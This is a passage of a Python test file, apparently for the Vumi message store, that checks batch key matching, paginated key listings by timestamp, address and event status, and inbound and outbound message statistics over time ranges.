'key': 'msg.to_addr',
'pattern': "\%s" % (msg.payload['to_addr'],),
'flags': 'i',
}])))
@inlineCallbacks
def test_outbound_keys_matching(self):
msg_id, msg, batch_id = yield self._create_outbound(content='hello')
self.assertEqual(
[msg_id],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'hell.+',
'flags': 'i',
}])))
# test case sensitivity
self.assertEqual(
[],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'HELLO',
'flags': '',
}])))
self.assertEqual(
[msg_id],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.from_addr',
'pattern': msg.payload['from_addr'],
'flags': 'i',
}])))
# the outbound to_addr has a leading +, it needs to be escaped
self.assertEqual(
[msg_id],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.to_addr',
'pattern': "\%s" % (msg.payload['to_addr'],),
'flags': 'i',
}])))
@inlineCallbacks
def test_add_inbound_message_with_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_inbound("hi")
yield self.store.add_inbound_message(
msg, batch_ids=[batch_id1, batch_id2])
stored_msg = yield self.store.get_inbound_message(msg['message_id'])
inbound_keys1 = yield self.store.batch_inbound_keys(batch_id1)
inbound_keys2 = yield self.store.batch_inbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys1, [msg['message_id']])
self.assertEqual(inbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_add_inbound_message_with_batch_id_and_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_inbound("hi")
yield self.store.add_inbound_message(
msg, batch_id=batch_id1, batch_ids=[batch_id2])
stored_msg = yield self.store.get_inbound_message(msg['message_id'])
inbound_keys1 = yield self.store.batch_inbound_keys(batch_id1)
inbound_keys2 = yield self.store.batch_inbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys1, [msg['message_id']])
self.assertEqual(inbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_add_outbound_message_with_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_outbound("hi")
yield self.store.add_outbound_message(
msg, batch_ids=[batch_id1, batch_id2])
stored_msg = yield self.store.get_outbound_message(msg['message_id'])
outbound_keys1 = yield self.store.batch_outbound_keys(batch_id1)
outbound_keys2 = yield self.store.batch_outbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys1, [msg['message_id']])
self.assertEqual(outbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_add_outbound_message_with_batch_id_and_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_outbound("hi")
yield self.store.add_outbound_message(
msg, batch_id=batch_id1, batch_ids=[batch_id2])
stored_msg = yield self.store.get_outbound_message(msg['message_id'])
outbound_keys1 = yield self.store.batch_outbound_keys(batch_id1)
outbound_keys2 = yield self.store.batch_outbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys1, [msg['message_id']])
self.assertEqual(outbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_batch_inbound_keys_page(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
all_keys = sorted(msg['message_id'] for msg in messages)
keys_p1 = yield self.store.batch_inbound_keys_page(batch_id, 6)
# Paginated results are sorted by key.
self.assertEqual(sorted(keys_p1), all_keys[:6])
keys_p2 = yield keys_p1.next_page()
self.assertEqual(sorted(keys_p2), all_keys[6:])
@inlineCallbacks
def test_batch_outbound_keys_page(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
all_keys = sorted(msg['message_id'] for msg in messages)
keys_p1 = yield self.store.batch_outbound_keys_page(batch_id, 6)
# Paginated results are sorted by key.
self.assertEqual(sorted(keys_p1), all_keys[:6])
keys_p2 = yield keys_p1.next_page()
self.assertEqual(sorted(keys_p2), all_keys[6:])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
first_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_without_timestamps(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, with_timestamps=False)
self.assertEqual(list(index_page), [k for k, _ in all_keys])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
first_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_without_timestamps(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, with_timestamps=False)
self.assertEqual(list(index_page), [k for k, _ in all_keys])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
first_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
first_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6)
results = list(page)
self.assertEqual(len(results), 6)
self.assertEqual(page.has_next_page(), True)
next_page = yield page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1])
self.assertEqual(list(page), all_keys[:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6, end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1], end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6)
results = list(page)
self.assertEqual(len(results), 6)
self.assertEqual(page.has_next_page(), True)
next_page = yield page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1])
self.assertEqual(list(page), all_keys[:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6, end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1], end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:-1])
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 10)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6)
results = list(page)
self.assertEqual(len(results), 6)
self.assertEqual(page.has_next_page(), True)
next_page = yield page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6, start=all_keys[-2][1])
self.assertEqual(list(page), all_keys[:-1])
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6, end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:])
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6, start=all_keys[-2][1], end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:-1])
@inlineCallbacks
def test_message_event_keys_with_statuses(self):
"""
Event keys and statuses for a message can be retrieved by index.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
drs = []
for status in TransportEvent.DELIVERY_STATUSES:
dr = self.msg_helper.make_delivery_report(
msg, delivery_status=status)
drs.append(dr)
yield self.store.add_event(dr)
def mk_tuple(e, status):
return e["event_id"], format_vumi_date(e["timestamp"]), status
all_keys = [mk_tuple(ack, "ack")] + [
mk_tuple(e, "delivery_report.%s" % (e["delivery_status"],))
for e in drs]
first_page = yield self.store.message_event_keys_with_statuses(
msg_id, max_results=3)
results = list(first_page)
self.assertEqual(len(results), 3)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 4)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_stats(self):
"""
batch_inbound_stats returns total and unique address counts for the
whole batch if no time range is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
inbound_stats = yield self.store.batch_inbound_stats(
batch_id, max_results=6)
self.assertEqual(inbound_stats, {"total": 10, "unique_addresses": 3})
@inlineCallbacks
def test_batch_inbound_stats_start(self):
"""
batch_inbound_stats returns total and unique address counts for all
messages newer than the start date if only the start date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
messages_3 = yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
messages_2 = yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
inbound_stats_1 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[2][1])
self.assertEqual(inbound_stats_1, {"total": 8, "unique_addresses": 3})
inbound_stats_2 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[6][1])
self.assertEqual(inbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_inbound_stats_end(self):
"""
batch_inbound_stats returns total and unique address counts for all
messages older than the end date if only the end date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
messages_3 = yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
messages_2 = yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
inbound_stats_1 = yield self.store.batch_inbound_stats(
batch_id, end=all_keys[-3][1])
self.assertEqual(inbound_stats_1, {"total": 8, "unique_addresses": 3})
inbound_stats_2 = yield self.store.batch_inbound_stats(
batch_id, end=all_keys[-7][1])
self.assertEqual(inbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_inbound_stats_range(self):
"""
batch_inbound_stats returns total and unique address counts for all
messages newer than the start date and older than the end date if both
are specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
messages_3 = yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
messages_2 = yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
inbound_stats_1 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-3][1])
self.assertEqual(inbound_stats_1, {"total": 6, "unique_addresses": 3})
inbound_stats_2 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-7][1])
self.assertEqual(inbound_stats_2, {"total": 2, "unique_addresses": 2})
@inlineCallbacks
def test_batch_outbound_stats(self):
"""
batch_outbound_stats returns total and unique address counts for the
whole batch if no time range is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
outbound_stats = yield self.store.batch_outbound_stats(
batch_id, max_results=6)
self.assertEqual(outbound_stats, {"total": 10, "unique_addresses": 3})
@inlineCallbacks
def test_batch_outbound_stats_start(self):
"""
batch_outbound_stats returns total and unique address counts for all
messages newer than the start date if only the start date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
messages_3 = yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
messages_2 = yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
outbound_stats_1 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[2][1])
self.assertEqual(outbound_stats_1, {"total": 8, "unique_addresses": 3})
outbound_stats_2 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[6][1])
self.assertEqual(outbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_outbound_stats_end(self):
"""
batch_outbound_stats returns total and unique address counts for all
messages older than the end date if only the end date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
messages_3 = yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
messages_2 = yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
outbound_stats_1 = yield self.store.batch_outbound_stats(
batch_id, end=all_keys[-3][1])
self.assertEqual(outbound_stats_1, {"total": 8, "unique_addresses": 3})
outbound_stats_2 = yield self.store.batch_outbound_stats(
batch_id, end=all_keys[-7][1])
self.assertEqual(outbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_outbound_stats_range(self):
"""
batch_outbound_stats returns total and unique address counts for all
messages newer than the start date and older than the end date if both
are specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
messages_3 = yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
messages_2 = yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
outbound_stats_1 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-3][1])
self.assertEqual(outbound_stats_1, {"total": 6, "unique_addresses": 3})
outbound_stats_2 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-7][1])
self.assertEqual(outbound_stats_2, {"total": 2, "unique_addresses": 2})
class TestMessageStoreCache(TestMessageStoreBase):
def clear_cache(self, message_store):
